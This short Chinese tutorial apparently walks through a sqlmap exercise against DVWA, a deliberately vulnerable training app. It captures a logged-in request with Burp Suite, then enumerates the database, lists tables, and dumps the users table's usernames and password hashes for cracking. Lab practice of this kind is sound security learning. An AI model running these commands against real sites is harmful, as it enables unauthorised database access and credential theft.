首先进入DVWA,调整安全级别为low。
打开SQL Injection页面,ID栏输入1
因为DVWA需要登录,所以使用Burp Suite抓包,包里包含了cookie。
将抓包内容保存至本地(/root/test)
打开终端,输入: sqlmap -r /root/test --current-db ,根据包里的内容猜解当前数据库,可以不加--current-db以爆破所有库。
得到当前使用库名'dvwa',输入:sqlmap -r /root/test -D dvwa --tables ,爆破dvwa库中的表名。
查看表名,比较感兴趣的是users表,所以输入:sqlmap -r /root/test -D dvwa -T users --columns ,爆破users表中的列。
出现user和password字段,输入:sqlmap -r /root/test -D dvwa -T users -C user,password --dump ,查看并顺手md5猜解一下。
网友评论